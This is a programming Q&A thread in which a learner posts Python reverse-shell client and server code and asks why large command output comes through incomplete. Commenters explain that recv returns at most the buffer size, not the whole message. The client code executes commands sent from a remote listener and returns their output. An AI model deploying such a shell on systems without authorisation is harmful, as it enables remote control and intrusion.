# Incomplete Output from connection.recv buffer

Tags: python-3.x, sockets, networking

Just started learning python,Code below is  python reverse-shell code. When I pass command which has a output of small byte size the code work perfectly. But when the size of the output resulted from the command increases, The output from the buffer hangs after certain length of the output string. for example commands like (`ls -la`) return the entire output string normally, but for commands like (`man man`),(`man git`) output from the `connection.recv` buffer stops after certain length. I tried changing the `BUFF_SIZE` every time it stops outputting after certain length

client code

```
#!/usr/bin/env python3
import os
import subprocess
import sys
import socket
target_host=""
target_port= 9999
HEADER=10

def commands():
    
    response=''
    while 'exit' not in response :
        response=str(client.recv(8024),"utf-8")  
        out=subprocess.Popen(response,shell=True,executable='/bin/bash',stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
        output=str(out.stdout.read()+out.stderr.read(),"utf-8")
        out=output+os.getcwd()+" -> "
        header=f'{len(out):<{HEADER}}' 
        combinedout=header+out
        client.sendall(str.encode(combinedout))


    client.close()
    print("connection terminated ...")
    sys.exit()

client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

print("connecting to {}".format(target_host))
client.connect((target_host,target_port))
print("connected !")
commands()
```

server

```
#!/usr/bin/env python3


import socket

BUFF_SIZE=1
HEADER=10

def commands(conn):
    command=""
    while command != 'exit':
        command=input()
        if command == '':
            print("\n")
            continue
        conn.send(str.encode(command))
        byt=int(conn.recv(HEADER).decode("utf-8"))
        full_msg=""
        count=0
        while (True):
            msg=conn.recv(BUFF_SIZE).decode("utf-8",'ignore')
            full_msg = full_msg + msg
            count = count + BUFF_SIZE
            if(count==byt): break 
        print(full_msg,end="")
        

def accept():
    conn,address=sock.accept()
#    print("connection established with {}:{}..",format(address[0],str(address[1])))
    commands(conn)
    conn.close()

ip='0.0.0.0'
port= 9999
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

print ("binding sockets..")
sock.bind((ip,port))
print("completed binding...")

sock.listen(1)
print("listening on {}:{} ".format(ip,port))


accept()
```

Comment: In short: your assumption that a single `recv` will return everything which was `send` or `sendall` is wrong. You need to check what was actually returned. Also, don't call `decode('utf-8')` on potentially incomplete data.

Comment: correct me if i'm wrong, from my understanding  the  data sent by the client `sendall` is stored in the buffer on the server side. every time i call `conn.recv(buff_size)` method it fetches buff_size length data from the buffer right? . Am i missing something?

Comment: *"...the data sent by the client sendall is stored in the buffer on the server side..."* - No. It is send to the server but not necessarily all at once. It depends on the TCP window and of the size of the buffer at the recipients side (which limits the window). *" it fetches buff_size length data from the buffer right?"* - No. It fetches __up to__ buff_size length data.

Comment: appreciate the help man @SteffenUllrich